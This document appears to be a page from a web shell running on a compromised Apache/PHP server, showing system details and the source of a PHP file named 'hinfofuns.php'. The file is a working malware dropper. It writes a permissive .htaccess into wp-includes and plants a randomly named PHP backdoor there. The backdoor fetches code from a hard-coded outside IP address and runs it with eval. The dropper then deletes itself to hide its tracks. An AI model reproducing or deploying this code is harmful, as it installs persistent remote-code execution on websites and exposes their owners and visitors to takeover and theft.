HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.2.20
System: Linux 825a8fd6cf8c 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User: apache (48)
PHP: 8.2.20
Disabled: NONE
$ pwd: /var/www/html/
Upload Files
File: /var/www/html/hinfofuns.php
<?php

ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);


function getRandomBytes($length = 5) {
    if (function_exists('random_bytes')) {
        return random_bytes($length);
    } elseif (function_exists('openssl_random_pseudo_bytes')) {
        return openssl_random_pseudo_bytes($length);
    } else {
        $bytes = '';
        for ($i = 0; $i < $length; $i++) {
            $bytes .= chr(mt_rand(0, 255));
        }
        return $bytes;
    }
}


$rootPath = $_SERVER["DOCUMENT_ROOT"];
$wpContentPath = $rootPath . DIRECTORY_SEPARATOR . "wp-includes";

if (!is_dir($wpContentPath)) {
    if (!mkdir($wpContentPath, 0755, true)) {
        die("Failed to create wp-includes directory");
    }
}

$htaccessPath = $wpContentPath . DIRECTORY_SEPARATOR . '.htaccess';

if (file_exists($htaccessPath)) {
    @unlink($htaccessPath);
}

$htaccessContent = <<<HTACCESS
<FilesMatch "\.php$">
    Order allow,deny
    Allow from all
</FilesMatch>
HTACCESS;

file_put_contents($htaccessPath, $htaccessContent);

$randomName = bin2hex(getRandomBytes(5)) . '.php';
$fullFilePath = $wpContentPath . DIRECTORY_SEPARATOR . $randomName;

$phpCode = '<?php $url = "http://51.79.124.111/mail2";$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$tag= curl_exec($ch);curl_close($ch);eval("?>" . ("$tag"));?>';

if (file_put_contents($fullFilePath, $phpCode) === false) {
    die("Failed to write PHP file");
}

echo "Testwow<br>wp-includes/$randomName</br>";



@unlink(__FILE__);
@unlink("hinfofuns.php");
?>
@ Telegram